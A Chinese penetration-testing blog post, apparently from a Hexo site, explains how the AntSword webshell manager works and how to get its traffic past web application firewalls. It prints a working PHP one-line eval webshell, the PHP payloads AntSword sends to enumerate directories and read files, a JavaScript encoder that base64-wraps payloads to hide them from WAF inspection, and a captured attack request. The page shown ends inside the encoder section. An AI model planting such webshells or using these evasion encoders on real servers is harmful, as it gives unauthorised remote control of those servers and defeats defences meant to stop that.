<!DOCTYPE html>
<html lang=zh>
<head>
  <meta charset="utf-8">
  
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui">
  <meta name="renderer" content="webkit">
  <meta http-equiv="Cache-Control" content="no-transform" />
  <meta http-equiv="Cache-Control" content="no-siteapp" />
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">
  <meta name="format-detection" content="telephone=no,email=no,adress=no">
  <!-- Color theme for statusbar -->
  <meta name="theme-color" content="#000000" />
  <!-- 强制页面在当前窗口以独立页面显示,防止别人在框架里调用页面 -->
  <meta http-equiv="window-target" content="_top" />
  
  
  <title>蚁剑—bypass | Hexo</title>
  <meta name="description" content="蚁剑的工作原理连接shell一句话shell 1&lt;?php @eval($_POST[&amp;#x27;cmd&amp;#x27;]);?&gt;  蚁剑会发送post包，给cmd参数传递不同操作对应的php代码，比如连接shell的时候传递 123456789101112131415161718192021222324252627282930313233343536@ini_set(&quot;disp">
<meta property="og:type" content="article">
<meta property="og:title" content="蚁剑—bypass">
<meta property="og:url" content="http://s1eady.top/2018/11/08/%E8%9A%81%E5%89%91%E4%BD%BF%E7%94%A8--Bypass%20Waf/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="蚁剑的工作原理连接shell一句话shell 1&lt;?php @eval($_POST[&amp;#x27;cmd&amp;#x27;]);?&gt;  蚁剑会发送post包，给cmd参数传递不同操作对应的php代码，比如连接shell的时候传递 123456789101112131415161718192021222324252627282930313233343536@ini_set(&quot;disp">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://steady-1302023625.cos.ap-beijing.myqcloud.com/makedown/image-20201011145536824.png">
<meta property="og:image" content="https://steady-1302023625.cos.ap-beijing.myqcloud.com/makedown/image-20201011150536317.png">
<meta property="og:image" content="https://steady-1302023625.cos.ap-beijing.myqcloud.com/makedown/image-20201012084450973.png">
<meta property="og:image" content="https://steady-1302023625.cos.ap-beijing.myqcloud.com/makedown/image-20201011165700645.png">
<meta property="og:image" content="https://steady-1302023625.cos.ap-beijing.myqcloud.com/makedown/image-20201011192041042.png">
<meta property="og:image" content="https://steady-1302023625.cos.ap-beijing.myqcloud.com/makedown/image-20201011191731747.png">
<meta property="article:published_time" content="2018-11-07T19:28:56.000Z">
<meta property="article:modified_time" content="2020-10-25T14:14:42.655Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="By-pass">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://steady-1302023625.cos.ap-beijing.myqcloud.com/makedown/image-20201011145536824.png">
  <!-- Canonical links -->
  <link rel="canonical" href="http://s1eady.top/2018/11/08/%E8%9A%81%E5%89%91%E4%BD%BF%E7%94%A8--Bypass%20Waf/index.html">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png" type="image/x-icon">
  
  
<link rel="stylesheet" href="/css/style.css">

  
  
  
  
<meta name="generator" content="Hexo 5.2.0"></head>


<body class="main-center theme-black" itemscope itemtype="http://schema.org/WebPage">
  <header class="header" itemscope itemtype="http://schema.org/WPHeader">
  <div class="slimContent">
    <div class="navbar-header">
      
      
      <div class="profile-block text-center">
        <a id="avatar" href="https://github.com/cofess" target="_blank">
          <img class="img-circle img-rotate" src="/images/1.jpg" width="200" height="200">
        </a>
        <h2 id="name" class="hidden-xs hidden-sm">果冻</h2>
        <h3 id="title" class="hidden-xs hidden-sm hidden-md">Penetration Testing</h3>
        <small id="location" class="text-muted hidden-xs hidden-sm"><i class="icon icon-map-marker"></i> 中国 南京</small>
      </div>
      
      <div class="search" id="search-form-wrap">

    <form class="search-form sidebar-form">
        <div class="input-group">
            <input type="text" class="search-form-input form-control" placeholder="搜索" />
            <span class="input-group-btn">
                <button type="submit" class="search-form-submit btn btn-flat" onclick="return false;"><i class="icon icon-search"></i></button>
            </span>
        </div>
    </form>
    <div class="ins-search">
  <div class="ins-search-mask"></div>
  <div class="ins-search-container">
    <div class="ins-input-wrapper">
      <input type="text" class="ins-search-input" placeholder="想要查找什么..." x-webkit-speech />
      <button type="button" class="close ins-close ins-selectable" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
    </div>
    <div class="ins-section-wrapper">
      <div class="ins-section-container"></div>
    </div>
  </div>
</div>


</div>
      <button class="navbar-toggle collapsed" type="button" data-toggle="collapse" data-target="#main-navbar" aria-controls="main-navbar" aria-expanded="false">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
    </div>
    <nav id="main-navbar" class="collapse navbar-collapse" itemscope itemtype="http://schema.org/SiteNavigationElement" role="navigation">
      <ul class="nav navbar-nav main-nav ">
        
        
        <li class="menu-item menu-item-home">
          <a href="/.">
            
            <i class="icon icon-home-fill"></i>
            
            <span class="menu-title">首页</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-archives">
          <a href="/archives">
            
            <i class="icon icon-archives-fill"></i>
            
            <span class="menu-title">归档</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-categories">
          <a href="/categories">
            
            <i class="icon icon-folder"></i>
            
            <span class="menu-title">分类</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-about">
          <a href="/about">
            
            <i class="icon icon-cup-fill"></i>
            
            <span class="menu-title">关于</span>
          </a>
        </li>
        
      </ul>
      
	
    <ul class="social-links">
    	
        <li><a href="/GXA111666" target="_blank" title="VX" data-toggle=tooltip data-placement=top><i class="icon icon-VX"></i></a></li>
        
        <li><a href="/1252195810" target="_blank" title="QQ" data-toggle=tooltip data-placement=top><i class="icon icon-QQ"></i></a></li>
        
        <li><a href="/1252195810@qq.com" target="_blank" title="E-Mail" data-toggle=tooltip data-placement=top><i class="icon icon-E-mail"></i></a></li>
        
        <li><a href="/atom.xml" target="_blank" title="Rss" data-toggle=tooltip data-placement=top><i class="icon icon-rss"></i></a></li>
        
    </ul>

    </nav>
  </div>
</header>

  
    <aside class="sidebar" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    
      <div class="widget">
    <h3 class="widget-title">公告</h3>
    <div class="widget-body">
        <div id="board">
            <div class="content">
                <p>深山夕照深秋雨 一往情深深几许</p>
            </div>
        </div>
    </div>
</div>

    
  </div>
</aside>

  
  
<aside class="sidebar sidebar-toc collapse" id="collapseToc" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    <nav id="toc" class="article-toc">
      <h3 class="toc-title">文章目录</h3>
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E8%9A%81%E5%89%91%E7%9A%84%E5%B7%A5%E4%BD%9C%E5%8E%9F%E7%90%86"><span class="toc-number">1.</span> <span class="toc-text">蚁剑的工作原理</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%BF%9E%E6%8E%A5shell"><span class="toc-number">1.1.</span> <span class="toc-text">连接shell</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E8%9A%81%E5%89%91%E4%BD%BF%E7%94%A8%E2%80%93Bypass-Waf"><span class="toc-number">2.</span> <span class="toc-text">蚁剑使用–Bypass Waf</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BF%AE%E6%94%B9%E8%9A%81%E5%89%91UA"><span class="toc-number">2.1.</span> <span class="toc-text">修改蚁剑UA</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%85%A8%E5%B1%80%E8%AE%BE%E7%BD%AE%E4%B8%AD%E6%B7%BB%E5%8A%A0%E8%AF%B7%E6%B1%82%E5%A4%B4"><span class="toc-number">2.1.1.</span> <span class="toc-text">全局设置中添加请求头</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8D%95%E7%8B%AC%E7%9A%84webshell%E6%B7%BB%E5%8A%A0%E8%AF%B7%E6%B1%82%E5%A4%B4"><span class="toc-number">2.1.2.</span> <span class="toc-text">单独的webshell添加请求头</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BF%AE%E6%94%B9%E6%BA%90%E4%BB%A3%E7%A0%81"><span class="toc-number">2.1.3.</span> <span class="toc-text">修改源代码</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8Multipart%E5%8F%91%E5%8C%85"><span class="toc-number">2.2.</span> <span class="toc-text">使用Multipart发包</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BC%96%E7%A0%81%E5%99%A8"><span class="toc-number">2.3.</span> <span class="toc-text">编码器</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%BC%96%E7%A0%81%E5%99%A8%E7%9A%84%E4%BD%9C%E7%94%A8"><span class="toc-number">2.3.1.</span> <span class="toc-text">编码器的作用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%9A%81%E5%89%91%E7%9A%84%E7%BC%96%E7%A0%81%E5%99%A8%E8%A7%84%E5%88%99"><span class="toc-number">2.3.2.</span> <span class="toc-text">蚁剑的编码器规则</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%BC%96%E7%A0%81%E5%99%A8%E8%A7%84%E5%88%99%E7%BB%95%E8%BF%87Waf"><span class="toc-number">2.3.3.</span> <span class="toc-text">编码器规则绕过Waf</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Base64%E7%BC%96%E7%A0%81"><span class="toc-number">2.3.3.1.</span> <span class="toc-text">Base64编码</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#rot13"><span class="toc-number">2.3.3.2.</span> <span class="toc-text">rot13</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%BC%96%E7%A0%81%E5%99%A8%E9%99%90%E5%88%B6"><span class="toc-number">2.3.4.</span> <span class="toc-text">编码器限制</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%A7%A3%E7%A0%81%E5%99%A8"><span class="toc-number">2.4.</span> <span class="toc-text">解码器</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A7%A3%E7%A0%81%E5%99%A8%E5%88%86%E6%9E%90"><span class="toc-number">2.4.1.</span> <span class="toc-text">解码器分析</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%87%AA%E5%88%B6%E7%BC%96%E7%A0%81%E5%99%A8"><span class="toc-number">2.4.2.</span> <span class="toc-text">自制编码器</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AF%B9%E7%A7%B0%E5%8A%A0%E5%AF%86%EF%BC%8C%E9%9D%9E%E5%AF%B9%E7%A7%B0%E5%8A%A0%E5%AF%86"><span class="toc-number">2.5.</span> <span class="toc-text">对称加密，非对称加密</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%AE%A2%E6%88%B7%E7%AB%AF%E5%85%8D%E6%9D%80"><span class="toc-number">3.</span> <span class="toc-text">客户端免杀</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#extract-%E5%8F%98%E9%87%8F%E8%A6%86%E7%9B%96%E8%BF%87D%E7%9B%BE"><span class="toc-number">3.1.</span> <span class="toc-text">extract 变量覆盖过D盾</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#parse-str-%E5%8F%98%E9%87%8F%E8%A6%86%E7%9B%96%E8%BF%87D%E7%9B%BE"><span class="toc-number">3.2.</span> <span class="toc-text">parse_str 变量覆盖过D盾</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#destruct-%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E8%BF%87D%E7%9B%BE"><span class="toc-number">3.3.</span> <span class="toc-text">__destruct 析构函数过D盾</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#null-%E6%8B%BC%E6%8E%A5%E8%BF%87D%E7%9B%BE"><span class="toc-number">3.4.</span> <span class="toc-text">null 拼接过D盾</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E2%80%98%E2%80%99-%E6%8B%BC%E6%8E%A5%E8%BF%87D%E7%9B%BE"><span class="toc-number">3.5.</span> <span class="toc-text">‘’ 拼接过D盾</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E2%80%98%E2%80%99-null-%E6%8B%BC%E6%8E%A5%E8%BF%87D%E7%9B%BE"><span class="toc-number">3.6.</span> <span class="toc-text">‘’ null 拼接过D盾</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#array-map%E5%87%BD%E6%95%B0%E8%BF%87D%E7%9B%BE"><span class="toc-number">3.7.</span> <span class="toc-text">array_map函数过D盾</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#call-user-func-array%E5%87%BD%E6%95%B0%E8%BF%87D%E7%9B%BE"><span class="toc-number">3.8.</span> <span class="toc-text">call_user_func_array函数过D盾</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#call-user-func%E5%87%BD%E6%95%B0%E8%BF%87D%E7%9B%BE"><span class="toc-number">3.9.</span> <span class="toc-text">call_user_func函数过D盾</span></a></li></ol></li></ol>
    </nav>
  </div>
</aside>

<main class="main" role="main">
  <div class="content">
  <article id="post-蚁剑使用--Bypass Waf" class="article article-type-post" itemscope itemtype="http://schema.org/BlogPosting">
    
    <div class="article-header">
      
        
  
    <h1 class="article-title" itemprop="name">
      蚁剑—bypass
    </h1>
  

      
      <div class="article-meta">
        <span class="article-date">
    <i class="icon icon-calendar-check"></i>
	<a href="/2018/11/08/%E8%9A%81%E5%89%91%E4%BD%BF%E7%94%A8--Bypass%20Waf/" class="article-date">
	  <time datetime="2018-11-07T19:28:56.000Z" itemprop="datePublished">2018-11-08</time>
	</a>
</span>
        
  <span class="article-category">
    <i class="icon icon-folder"></i>
    <a class="article-category-link" href="/categories/By-pass/">By-pass</a>
  </span>

        
  <span class="article-tag">
    <i class="icon icon-tags"></i>
	<a class="article-tag-link-link" href="/tags/By-pass/" rel="tag">By-pass</a>
  </span>


        

        <span class="post-comment"><i class="icon icon-comment"></i> <a href="/2018/11/08/%E8%9A%81%E5%89%91%E4%BD%BF%E7%94%A8--Bypass%20Waf/#comments" class="article-comment-link">评论</a></span>
        
      </div>
    </div>
    <div class="article-entry marked-body" itemprop="articleBody">
      
        <h1 id="蚁剑的工作原理"><a href="#蚁剑的工作原理" class="headerlink" title="蚁剑的工作原理"></a>蚁剑的工作原理</h1><h2 id="连接shell"><a href="#连接shell" class="headerlink" title="连接shell"></a>连接shell</h2><p>一句话shell</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> @<span class="keyword">eval</span>($_POST[<span class="string">&#x27;cmd&#x27;</span>]);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>蚁剑会发送post包，给cmd参数传递不同操作对应的php代码，比如连接shell的时候传递</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">@ini_set(<span class="string">&quot;display_errors&quot;</span>, <span class="string">&quot;0&quot;</span>);</span><br><span class="line">@set_time_limit(<span class="number">0</span>);</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">asenc</span>(<span class="params">$out</span>)</span>&#123;</span><br><span class="line">    <span class="keyword">return</span> $out;</span><br><span class="line">&#125;;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">asoutput</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">    $output=ob_get_contents();</span><br><span class="line">    ob_end_clean();</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;595fa0323f&quot;</span>;</span><br><span class="line">    <span class="keyword">echo</span> @asenc($output);</span><br><span class="line">    <span class="keyword">echo</span><span class="string">&quot;da825&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line">ob_start();</span><br><span class="line"><span class="keyword">try</span>&#123;</span><br><span class="line">    $D=dirname($_SERVER[<span class="string">&quot;SCRIPT_FILENAME&quot;</span>]);</span><br><span class="line">    <span class="keyword">if</span>($D==<span class="string">&quot;&quot;</span>)</span><br><span class="line">		$D=dirname($_SERVER[<span class="string">&quot;PATH_TRANSLATED&quot;</span>]);</span><br><span class="line">    $R=<span class="string">&quot;<span class="subst">&#123;$D&#125;</span>	&quot;</span>;</span><br><span class="line">    <span class="keyword">if</span>(substr($D,<span class="number">0</span>,<span class="number">1</span>)!=<span class="string">&quot;/&quot;</span>)&#123;</span><br><span class="line">    	<span class="keyword">foreach</span>(range(<span class="string">&quot;C&quot;</span>,<span class="string">&quot;Z&quot;</span>)<span class="keyword">as</span> $L)</span><br><span class="line">    	    <span class="keyword">if</span>(is_dir(<span class="string">&quot;<span class="subst">&#123;$L&#125;</span>:&quot;</span>))</span><br><span class="line">	        	$R.=<span class="string">&quot;<span class="subst">&#123;$L&#125;</span>:&quot;</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        $R.=<span class="string">&quot;/&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    $R.=<span class="string">&quot;	&quot;</span>;</span><br><span class="line">    $u=(function_exists(<span class="string">&quot;posix_getegid&quot;</span>))?@posix_getpwuid(@posix_geteuid()):<span class="string">&quot;&quot;</span>;</span><br><span class="line">    $s=($u)?$u[<span class="string">&quot;name&quot;</span>]:@get_current_user();</span><br><span class="line">    $R.=php_uname();</span><br><span class="line">    $R.=<span class="string">&quot;	<span class="subst">&#123;$s&#125;</span>&quot;</span>;</span><br><span class="line">    <span class="keyword">echo</span> $R;;</span><br><span class="line">&#125; <span class="keyword">catch</span>(<span class="built_in">Exception</span> $e)&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;ERROR://&quot;</span>.$e-&gt;getMessage();</span><br><span class="line">&#125;;</span><br><span class="line">asoutput();</span><br><span class="line"><span class="keyword">die</span>();</span><br></pre></td></tr></table></figure>

<p>查看php文件</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">@ini_set(<span class="string">&quot;display_errors&quot;</span>, <span class="string">&quot;0&quot;</span>);</span><br><span class="line">@set_time_limit(<span class="number">0</span>);</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">asenc</span>(<span class="params">$out</span>)</span>&#123;</span><br><span class="line">    <span class="keyword">return</span> $out;</span><br><span class="line">&#125;;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">asoutput</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">    $output=ob_get_contents();</span><br><span class="line">    ob_end_clean();</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;7545b34&quot;</span>;</span><br><span class="line">    <span class="keyword">echo</span> @asenc($output);</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;644b58cc3bac&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line">ob_start();</span><br><span class="line"><span class="keyword">try</span>&#123;</span><br><span class="line">    $F=base64_decode($_POST[<span class="string">&quot;x7e381bdf1773a&quot;</span>]);</span><br><span class="line">    $P=@fopen($F,<span class="string">&quot;r&quot;</span>);</span><br><span class="line">    <span class="keyword">echo</span>(@fread($P,filesize($F)?filesize($F):<span class="number">4096</span>));</span><br><span class="line">    @fclose($P);;</span><br><span class="line">&#125;<span class="keyword">catch</span>(<span class="built_in">Exception</span> $e)&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;ERROR://&quot;</span>.$e-&gt;getMessage();</span><br><span class="line">&#125;;</span><br><span class="line">asoutput();</span><br><span class="line"><span class="keyword">die</span>();</span><br><span class="line">&amp;x7e381bdf1773a=RTovcGhwc3R1ZHkvcGhwc3R1ZHlfcHJvL1dXVy9zcWxpMS9MZXNzLTEvaW5kZXgucGhw</span><br></pre></td></tr></table></figure>



<h1 id="蚁剑使用–Bypass-Waf"><a href="#蚁剑使用–Bypass-Waf" class="headerlink" title="蚁剑使用–Bypass Waf"></a>蚁剑使用–Bypass Waf</h1><h2 id="修改蚁剑UA"><a href="#修改蚁剑UA" class="headerlink" title="修改蚁剑UA"></a>修改蚁剑UA</h2><h3 id="全局设置中添加请求头"><a href="#全局设置中添加请求头" class="headerlink" title="全局设置中添加请求头"></a>全局设置中添加请求头</h3><p><img src="https://steady-1302023625.cos.ap-beijing.myqcloud.com/makedown/image-20201011145536824.png" alt="image-20201011145536824"></p>
<h3 id="单独的webshell添加请求头"><a href="#单独的webshell添加请求头" class="headerlink" title="单独的webshell添加请求头"></a>单独的webshell添加请求头</h3><p><img src="https://steady-1302023625.cos.ap-beijing.myqcloud.com/makedown/image-20201011150536317.png" alt="image-20201011150536317"></p>
<h3 id="修改源代码"><a href="#修改源代码" class="headerlink" title="修改源代码"></a>修改源代码</h3><p>在项目路径<code>.modules/request.js</code>中进行修改:</p>
<p>另外项目路径下的<code>.modules/update.js</code>也需要修改：</p>
<h2 id="使用Multipart发包"><a href="#使用Multipart发包" class="headerlink" title="使用Multipart发包"></a>使用Multipart发包</h2><p><img src="https://steady-1302023625.cos.ap-beijing.myqcloud.com/makedown/image-20201012084450973.png" alt="image-20201012084450973"></p>
<p>数据会以post的表单形式发送。</p>
<h2 id="编码器"><a href="#编码器" class="headerlink" title="编码器"></a>编码器</h2><h3 id="编码器的作用"><a href="#编码器的作用" class="headerlink" title="编码器的作用"></a>编码器的作用</h3><p>当使用蚁剑控制webshell向服务器发送数据包时，数据包中的body部分会按照编码器中定义的规则进行编码或者加密后在发送，这样就可以避免有比较明显的命令执行特征从儿被WAF拦截。</p>
<h3 id="蚁剑的编码器规则"><a href="#蚁剑的编码器规则" class="headerlink" title="蚁剑的编码器规则"></a>蚁剑的编码器规则</h3><p>以下规则就是蚁剑的默认编码规则，如图：</p>
<p><img src="https://steady-1302023625.cos.ap-beijing.myqcloud.com/makedown/image-20201011165700645.png" alt="image-20201011165700645"></p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * php::base64编码器</span></span><br><span class="line"><span class="comment"> * Create at: 2020/08/19 7:30:36</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"></span><br><span class="line"><span class="meta">&#x27;use strict&#x27;</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">* @param  &#123;String&#125; pwd   连接密码</span></span><br><span class="line"><span class="comment">* @param  &#123;Array&#125;  data  编码器处理前的 payload 数组</span></span><br><span class="line"><span class="comment">* @return &#123;Array&#125;  data  编码器处理后的 payload 数组</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="built_in">module</span>.exports = <span class="function">(<span class="params">pwd, data, ext=&#123;&#125;</span>) =&gt;</span> &#123;</span><br><span class="line">  <span class="comment">// ##########    请在下方编写你自己的代码   ###################</span></span><br><span class="line">  <span class="comment">// 以下代码为 PHP Base64 样例</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">// 生成一个随机变量名</span></span><br><span class="line">  <span class="keyword">let</span> randomID = <span class="string">`_0x<span class="subst">$&#123;<span class="built_in">Math</span>.random().toString(<span class="number">16</span>).substr(<span class="number">2</span>)&#125;</span>`</span>;</span><br><span class="line">  <span class="comment">// 原有的 payload 在 data[&#x27;_&#x27;]中</span></span><br><span class="line">  <span class="comment">// 取出来之后，转为 base64 编码并放入 randomID key 下</span></span><br><span class="line">  data[randomID] = Buffer.from(data[<span class="string">&#x27;_&#x27;</span>]).toString(<span class="string">&#x27;base64&#x27;</span>);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// shell 在接收到 payload 后，先处理 pwd 参数下的内容，</span></span><br><span class="line">  data[pwd] = <span class="string">`eval(base64_decode($_POST[<span class="subst">$&#123;randomID&#125;</span>]));`</span>;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// ##########    请在上方编写你自己的代码   ###################</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">// 删除 _ 原有的payload</span></span><br><span class="line">  <span class="keyword">delete</span> data[<span class="string">&#x27;_&#x27;</span>];</span><br><span class="line">  <span class="comment">// 返回编码器处理后的 payload 数组</span></span><br><span class="line">  <span class="keyword">return</span> data;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>整个代码是一个module.exports函数，其中有三个参数pwd、data、ext。</p>
<ul>
<li>pwd: 类型是String, 这个是 shell 的连接密码</li>
<li>data: 类型是 Array, 这个是要发送的 HTTP POST 数据包</li>
<li>ext: 它是个对象，这个是一些扩展参数</li>
</ul>
<p>在自定义编码方式时只需要去修改<code>data[&#39;_&#39;]</code>中的内容就可以了。</p>
<p>将蚁剑使用burp代理拦截，查看请求。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">POST /steady.php HTTP/<span class="number">1.1</span></span><br><span class="line">Host: <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>:<span class="number">8888</span></span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">User-Agent: antSword/v2<span class="number">.1</span></span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: <span class="number">948</span></span><br><span class="line">Connection: close</span><br><span class="line"></span><br><span class="line">_0xe804371f038f9=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZnVuY3Rpb24gYXNlbmMoJG91dCl7cmV0dXJuICRvdXQ7fTtmdW5jdGlvbiBhc291dHB1dCgpeyRvdXRwdXQ9b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7ZWNobyAiZTgxZjMyNjlmNjczIjtlY2hvIEBhc2VuYygkb3V0cHV0KTtlY2hvICJiMDkxMTRjNSI7fW9iX3N0YXJ0KCk7dHJ5eyREPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTtpZigkRD09IiIpJEQ9ZGlybmFtZSgkX1NFUlZFUlsiUEFUSF9UUkFOU0xBVEVEIl0pOyRSPSJ7JER9CSI7aWYoc3Vic3RyKCRELDAsMSkhPSIvIil7Zm9yZWFjaChyYW5nZSgiQyIsIloiKWFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9ZWxzZXskUi49Ii8iO30kUi49IgkiOyR1PShmdW5jdGlvbl9leGlzdHMoInBvc2l4X2dldGVnaWQiKSk%<span class="number">2</span>FQHBvc2l4X2dldHB3dWlkKEBwb3NpeF9nZXRldWlkKCkpOiIiOyRzPSgkdSk%<span class="number">2</span>FJHVbIm5hbWUiXTpAZ2V0X2N1cnJlbnRfdXNlcigpOyRSLj1waHBfdW5hbWUoKTskUi49Igl7JHN9IjtlY2hvICRSOzt9Y2F0Y2goRXhjZXB0aW9uICRlKXtlY2hvICJFUlJPUjovLyIuJGUtPmdldE1lc3NhZ2UoKTt9O2Fzb3V0cHV0KCk7ZGllKCk7&amp;cmd=eval(base64_decode(%<span class="number">24</span>_POST%<span class="number">5</span>B_0xe804371f038f9%<span class="number">5</span>D))%<span class="number">3</span>B</span><br></pre></td></tr></table></figure>

